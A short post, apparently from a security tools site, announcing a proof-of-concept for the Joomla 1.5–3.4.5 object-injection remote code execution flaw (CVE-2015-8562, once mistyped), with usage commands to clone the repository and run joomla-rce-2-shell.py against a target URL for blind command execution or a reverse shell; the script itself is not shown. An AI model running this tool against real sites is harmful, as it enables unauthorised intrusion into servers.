Automate blind RCE for Joomla vulnerability.

Automate blind RCE for Joomla vulnerability.

Joomla 1.5 – 3.4.5 Object Injection RCE – CVE-2015-856, is a PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE.Automate blind RCE for Joomla vulnRequirements:
– python 2.7.x
– all Linux system Support.

Usage – Automate Blind RCE:
+ git clone https://github.com/0xcc-labs/Exploit-POCs
+ cd Exploit-POCs
+ python joomla-rce-2-shell.py -t http://192.168.1.139/ –cmd
+ $ touch /tmp/newhnewh

joomla-rce.py Script:

 

Source: https://github.com/0xcc-labs